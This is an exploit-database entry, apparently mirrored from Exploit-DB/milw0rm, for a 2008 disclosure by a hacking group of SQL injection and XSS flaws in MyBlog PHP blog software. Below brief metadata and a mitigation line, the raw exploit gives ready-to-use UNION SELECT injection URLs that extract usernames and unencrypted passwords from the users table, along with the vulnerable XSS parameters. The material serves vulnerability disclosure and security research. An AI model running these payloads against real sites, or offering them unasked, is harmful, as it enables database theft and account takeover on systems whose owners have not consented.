MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities

vendor:

MyBlog: PHP and MySQL Blog/CMS software

by:

CWH Underground

8.8

CVSS

HIGH

SQL Injection and XSS

89 (SQL Injection) and 79 (XSS)

CWE

Product Name: MyBlog: PHP and MySQL Blog/CMS software

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: No

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities

MyBlog: PHP and MySQL Blog/CMS software is vulnerable to multiple remote vulnerabilities, including SQL Injection and XSS. The SQL Injection vulnerability can be exploited to extract usernames and passwords from the database, while the XSS vulnerability can be exploited to inject malicious code into the application. The exploits require that Magic Quotes be turned off.

Mitigation:

Ensure that Magic Quotes are enabled and that all user-supplied input is properly sanitized.

Source

Exploit-DB raw data:

=====================================================================================
  MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Multiple Remote Vulnerabilities
=====================================================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : MyBlog: PHP and MySQL Blog/CMS software
 DOWNLOAD    : http://downloads.sourceforge.net/myblog
#####################################################

--- Remote SQL Injection ---

** Magic Quote must turn off **

----------
 Exploits
----------

[+] http://[Target]/os/index.php?view=[SQL Injection]
[+] http://[Target]/os/member.php?id=[SQL Injection]
[+] http://[Target]/os/post.php?id=[SQL Injection]

   **This exploits can get username and password (No Encryption)**

--------------
 POC Exploits
--------------

[+] http://192.168.24.25/os/index.php?view=cwh'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1
[+] http://192.168.24.25/os/member.php?id=-9999'/**/UNION/**/SELECT/**/concat(user,0x3a,password),2,3,email,5,6,7,8,9,10/**/FROM/**/myblog_users/**/WHERE/**/perm='1
[+] http://192.168.24.25/os/post.php?id=-9999'/**/UNION/**/SELECT/**/1,2,email,concat(user,0x3a,password),5,6,7,8,9,10,11/**/FROM/**/myblog_users/**/WHERE/**/perm='1



--- Remote XSS ---

----------
 Exploits
----------

[+] http://[Target]/os/index.php?s=[XSS]
[+] http://[Target]/os/index.php?sort=[XSS]
[+] http://[Target]/os/post.php?id=[XSS]


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]